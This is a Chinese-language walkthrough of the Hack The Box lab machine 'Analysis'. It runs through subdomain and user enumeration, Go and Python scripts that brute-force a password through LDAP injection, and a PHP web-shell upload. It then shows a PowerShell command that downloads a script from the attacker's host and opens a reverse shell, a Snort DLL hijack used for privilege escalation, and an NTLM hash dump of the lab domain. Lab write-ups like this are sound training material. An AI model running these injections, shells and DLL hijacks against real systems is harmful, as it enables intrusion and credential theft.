扫描靶机
nmap -A 10.10.11.250
从上面看似一台DC主机,ldap端口,88端口,将analysis.htb的默认域名写进去hosts
echo "10.10.11.250 Analysis.htb" | sudo tee -a /etc/hosts
然后打开一下
就一个静态的页面,啥也没有,然后fuzz一下子域名
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://analysis.htb/ -H "Host: FUZZ.analysis.htb" --hc 404
fuzz出一个internal子域名,写进去hosts,访问一下
发现是403返回,权限不够,那就扫描一下目录,使用一下gobuster,很久没用…
gobuster dir -u http://internal.analysis.htb/dashboard -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x php,txt
扫出来后一个后台登录页面
http://internal.analysis.htb/employees/login.php,进去看看
使用seclists里面的大型用户名字典,将他复制到喜欢的文件夹,然后使用sed命令编译该字典,sed可以一次性编译多个文本,然后在这个字典的每一行用户名后面都加上 "@analysis.htb”
cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt cxkuser.txt
sed -i "s|$|@analysis.htb|" cxkuser.txt
./kerbrute userenum -d analysis.htb cxkuser.txt --dc analysis.htb
将fuzz出来的用户名保存起来,期间刚刚扫目录的时候一个/user/list.php的目录点进去看看
网页出现了“missing parameter”的错误信息,说明了list.php在 URL 查询字符串中传递一个参数,但没有收到,就是缺少参数,在后面添加参数name,*号作为通用符:http://internal.analysis.htb/users/list.php?name=*
可以看到出现了一个表格,已知用户名是technician,猜测是ldap查询,可以尝试不断的枚举,这是进行LDAP模糊注入测试,可以使用脚本,该脚本是国外大佬提供
cxk.go
package main
import (
"bufio"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
)
func main() {
// Prompt user for wordlist input
fmt.Print("Enter the wordlist or charset (press Enter to use the default): ")
scanner := bufio.NewScanner(os.Stdin)
scanner.Scan()
charsetPath := strings.TrimSpace(scanner.Text())
// Use default wordlist if user didn't provide one
if charsetPath == "" {
charsetPath = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
}
baseURL := "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)"
foundChars := ""
file, err := os.Open(charsetPath)
if err != nil {
fmt.Println("Error opening charset file:", err)
return
}
defer file.Close()
scanner = bufio.NewScanner(file)
for scanner.Scan() {
char := strings.TrimSpace(scanner.Text())
//fmt.Println("Trying character:", char)
//thisisthat := "OnlyWorkingInput:"
modifiedURL := strings.Replace(baseURL, "{FUZZ}", char, 1)
modifiedURL = strings.Replace(modifiedURL, "{found_char}", foundChars, 1)
fmt.Println("Modified URL:", modifiedURL)
//fmt.Println(thisisthat,"{found_char}",foundChars, 1)
response, err := http.Get(modifiedURL)
if err != nil {
fmt.Println("Error making HTTP request:", err)
return
}
defer response.Body.Close()
body, err := ioutil.ReadAll(response.Body)
if err != nil {
fmt.Println("Error reading response body:", err)
return
}
if strings.Contains(response.Status, "200 OK") && strings.Contains(string(body), "technician") {
fmt.Println("Found character:", char)
foundChars += char
file.Seek(0, 0) // Move the file pointer to the beginning for another iteration
}
}
if err := scanner.Err(); err != nil {
fmt.Println("Error reading charset file:", err)
return
}
fmt.Println("Final found characters:", foundChars)
}
fuzz出了参数值是97NTtl*,继续进行模糊注入,)(这部分尝试结束前一个查询的 LDAP 搜索过滤器。(%26(是 URL 编码后的&(代表逻辑 "AND"),用来组合多个 LDAP 查询条件。(objectClass=user)是一个 LDAP 查询,指定了要搜索的对象类别为 "user"。(description=*)这部分是利用了 LDAP 中的通用符号,这次可以使用脚本模糊测试,使用python脚本
import argparse
import requests
def main():
# 解析命令行参数
parser = argparse.ArgumentParser(description="Brute-force script with optional proxy")
parser.add_argument("-p", "--proxy", default="127.0.0.1:8080", help="Proxy address and port (default is 127.0.0.1:8080)")
parser.add_argument("-w", "--wordlist", help="Path to the wordlist or charset file")
args = parser.parse_args()
# 如果用户未提供字母表文件,则使用默认字母表文件路径
charset_path = args.wordlist if args.wordlist else "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
# 基本URL,包含FUZZ和found_char占位符
base_url = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97NTtl*{found_char}{FUZZ})"
found_chars = "" # 用于存储已找到的字符
skip_count = 6 # 跳过前6个'*'字符
add_star = True # 标志,用于确定是否添加'*'字符
with open(charset_path, 'r') as file:
for char in file:
char = char.strip()
# 检查是否找到'*'字符并跳过前6个'*'字符
if '*' in char and skip_count > 0:
skip_count -= 1
continue
# 在第一次遇到'*'字符后添加'*'
if '*' in char and add_star:
found_chars += char
print("Found character:", char)
add_star = False
continue
# 替换占位符并生成修改后的URL
modified_url = base_url.replace("{FUZZ}", char).replace("{found_char}", found_chars)
print("Modified URL:", modified_url)
# 设置代理
proxies = {'http': args.proxy, 'https': args.proxy}
response = requests.get(modified_url, proxies=proxies)
# 检查响应文本是否包含"technician"并且状态码为200
if "technician" in response.text and response.status_code == 200:
print("Found character:", char)
found_chars += char
file.seek(0, 0) # 将文件指针移回文件开头以进行另一次迭代
print("Final found characters:", found_chars)
if __name__ == "__main__":
main()
http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97NTtl*4QP96Bv)
成功fuzz出了密码是97NTtl*4QP96Bv,使用kerbrute进行测试登录
看来测试成功了,直接进入登录后台
进入到Tickets选项,可以看到很多用户名
记住用户名,然后走到SOC Report那里,可以上传文件,上传一个cmd的php
上传成功了,之前使用gobuster找出了upload的地址,直接访问
然后直接使用命令上传nc,直接点击
直接拿到了svc_web的shell,通过搜寻,在C:inetpubinternalusers底下的list.php源码中发现了webservice的密码
$ldap_password = 'N1G6G46G@G!j';
$ldap_username = '[email protected]';
$ldap_connection = ldap_connect("analysis.htb");
这次上传RunasCs工具,它允许用户以其他用户的身份执行命令和程序。这个工具类似于 Windows 自带的runas命令,但是有个好处,就是可以在批处理文件或自动化脚本中使用,以执行需要不同用户权限的任务,然后结合该脚本:
Invoke-ConPtyShell
可以直接拿webservice的shell
RunasCs.exe "webservice" "N1G6G46G@G!j" "powershell.exe -c IEX(IWR -UseBasicParsing 'http://10.10.14.87/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell -RemoteIp 10.10.14.87 -RemotePort 8080 -Rows 120 -Cols 38 -CommandLine cmd.exe" -d "analysis.htb"
记得使用stty raw -echo;参数来修复回显模式,不然会很难看,成功拿到了analysiswebservice,上传个shell,接下来使用PrivescCheck.ps1脚本来寻找可以提权的路径,也可以直接查看注册表的值拿到密码
https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
reg query "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"
将之前kerbrute枚举出来的用户名收集起来,使用crackmapexec验证
crackmapexec winrm 10.10.11.250 -u user.txt -p '7y4Z4^*y9Zzj'
成功拿到user flag,在C盘底下有个Snort的文件夹,进入到lib,使用icacls命令查看
可以看到AUTORITE NTSystŠme用户有完全的控制权,可以分析Snort软件是一个开源的网络入侵检测系统,其中Snortlibsnort_dynamicpreprocessor目录就是增强snort软件的使用模块,也可以自定义模块,所以可以上传一个dll,替换掉其中的sf_engine.dll模块,该模块是动态链接库文件,并添加一个自己的模块
然后经过漫长的等待跟运气,就会自动连接上,成功拿到root flag
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:584d96946e4ad1ddfa4f8d7938faf91d:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8549ecd32b0253e9894a422299fe2466:::
jdoe:1103:aad3b435b51404eeaad3b435b51404ee:190193db2c6c6d69c60cf5af64447ce0:::
soc_analyst:1104:aad3b435b51404eeaad3b435b51404ee:d6f020bbee8043520eb569e540913bd4:::
cwilliams:1105:aad3b435b51404eeaad3b435b51404ee:ce88373ebd6d687eac0a405734a266aa:::
technician:1106:aad3b435b51404eeaad3b435b51404ee:ce88373ebd6d687eac0a405734a266aa:::
webservice:1107:aad3b435b51404eeaad3b435b51404ee:780b446d7d76a85880ce49a387f18642:::
wsmith:1109:aad3b435b51404eeaad3b435b51404ee:3da4104738938858384180964346fc6c:::
jangel:1110:aad3b435b51404eeaad3b435b51404ee:eea7337a28121aab144ca78fed48fc7e:::
lzen:1111:aad3b435b51404eeaad3b435b51404ee:eea7337a28121aab144ca78fed48fc7e:::
svc_web:2101:aad3b435b51404eeaad3b435b51404ee:cf74f3b0e86e17fba5051e261b9785b2:::
amanson:2103:aad3b435b51404eeaad3b435b51404ee:5d5b796cd37d9e19d9d1ae10c22ffa78:::
badam:2104:aad3b435b51404eeaad3b435b51404ee:5d5b796cd37d9e19d9d1ae10c22ffa78:::
DC-ANALYSIS$:1000:aad3b435b51404eeaad3b435b51404ee:2ec9198220c4bb7306ba170b7fa007f9:::
原文始发于微信公众号(Jiyou too beautiful):HTB-Analysis笔记
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论